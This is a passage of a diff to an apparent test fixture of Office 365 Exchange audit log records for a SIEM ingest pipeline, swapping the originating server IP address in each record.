AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -784,7 +784,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -858,7 +858,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -870,7 +870,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -944,7 +944,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -956,7 +956,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1030,7 +1030,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1042,7 +1042,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1116,7 +1116,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1128,7 +1128,7 @@ "Operation": "Set-TenantObjectVersion", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -1150,7 +1150,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1162,7 +1162,7 @@ "Operation": "Set-TransportConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -1188,7 +1188,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1200,7 +1200,7 @@ "Operation": "Set-TransportConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -1226,7 +1226,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1238,7 +1238,7 @@ "Operation": "Set-TenantObjectVersion", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -1260,7 +1260,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1272,7 +1272,7 @@ "Operation": "Set-TransportConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -1298,7 +1298,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 